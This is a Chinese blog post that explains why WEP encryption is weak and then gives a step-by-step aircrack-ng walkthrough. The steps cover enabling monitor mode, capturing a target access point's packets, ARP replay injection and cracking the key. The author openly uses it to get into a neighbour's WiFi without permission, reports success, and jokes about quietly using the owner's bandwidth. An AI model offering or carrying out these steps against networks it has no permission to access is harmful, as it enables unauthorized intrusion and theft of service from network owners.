wep加密破解原理简述实战

没钱交网费，断网了。只能打开wiki扫描，碰碰运气，看看能不能找到没加密的。结果没有，但却发现有用wep加密的热点信号不错，而且经常在线。印象中，wep是不安全的加密方式，但不清楚是不是用不靠谱的字典方式暴力破解。

用手机查了一下，发现有靠谱的破解方法，开搞！

左图：

IV 初始向量，随机生成。
PASSWORD用户密码。我们的破解目标
KSA 和 PRGA 简单理解为一个加密函数就行。
DATA 为我们要传输的数据
CRC-32为DATA的校验码，为明文的完整性校验值。实际上跟这里的破解无关，可以忽略。
PRGA=RC4(KSA)

简化版就是加密数据 = f （原数据， IV，密码）

右图：

解出IV，然后加上客户端知道的密码，生成解密算法，然后跟密文xor一下即可。

要点就是

IV随机生成，会变化的，而且是明文传输。
加密算法有缺陷，导致可以根据IV反推密码。

因为不是专门搞这块的，细节就不想去深究了。

参考资料

http://zhaoxiaobu.blog.51cto.com/878176/254633

http://www.2cto.com/kf/201204/126344.html

http://itbbs.pconline.com.cn/network/11090686.html

下面讲破解，搜了一些教程，命令各不相同，所以自己总结了下。工具请先到有网络的地方下载

/* 命令的参数为了明显一点我用【中括号】括起来了，使用时注意替换为自己对应的值。*/

0.安装工具。我用的是ubuntu。没有linux的环境的看看网上介绍的backtrack5或者beini。

sudo apt-get install aircrack-ng

1.查看自己的网卡接口，一般是wlan0;顺便记下自己网卡的地址备用。

ifconfig

2.开启网卡监控模式，最后一个参数是频道，可以不加。失败的话再加上试试。成功时会看到(monitor mode enabled on mon0)，mon0就是启动的接口名

sudo airmon-ng start 【wlan0】 【1】

3.看看有哪些采用wep加密的AP在线，然后按 ctrl+c 可以退出。注意，wep加密的才行，同时还能看到bssid（网卡地址）和ch（频道），不清楚这个ch跟上面启动时指定的ch有没关系。

sudo airodump-ng 【mon0】

4.抓取数据包写入文件

sudo airodump-ng -c 【6】 --bssid 【MAC】 -w 【wep】 【mon0】

-c 和 --bssid 两个参数是上面的步骤获取的。
-w 是输出的文件名,会有对应的*.cap *.csv等文件
mon0 名字跟第三步对应

注意看#data的数值。它代表了我们迄今一共抓取到的有用的数据包数量。运气好的话它应该是在一直增长的，即使可能很慢。老实说我们需要大概5000-25000个才能破解密码。

5.数据包太少就自己注入（可选步骤） /* 我的机器上运行不成功，google了一了，好像是得装bt5之类的linux版本才行。*/
aireplay-ng --arpreplay -b 【bssid】 -h 【自己网卡mac】【mon0】

6.当收集的数据包数量达到5000后，我们就可以开始破解这些包了。打开一个新终端，输入（原来抓包的终端不用停，让它继续跑）：
aircrack-ng -z -b 【bssid】【wep.cap】

破解速度很快，我跑的结果不到一分钟就出来了 Tested 9 keys (got 42637 IVs)
然后把下面key found 那个字段去掉标点符号就是密码了。

比如 34:f2:a3:d4:e4 -> 34f2a3d4e4

估计不是用户的原始密码，只是最后算出来的数值跟用户的密码一致。

7.打完收工关闭监控模式

sudo airmon-ng stop 【mon0】

参考文章

http://www.geekfan.net/1713/

http://blog.163.com/prettysnail@126/blog/static/112327390201006113256824/

注意控制自己的带宽，不要影响原来主人正常上网。提供宽带利用率，不亦乐乎！